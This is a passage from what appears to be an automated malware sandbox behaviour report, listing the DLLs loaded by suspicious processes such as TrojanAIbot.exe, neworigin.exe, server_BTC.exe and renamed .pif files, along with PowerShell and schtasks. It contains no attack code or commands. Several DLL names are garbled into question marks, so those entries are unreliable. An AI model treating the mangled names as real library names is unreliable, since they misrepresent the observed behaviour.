                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: version.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: uxtheme.dll
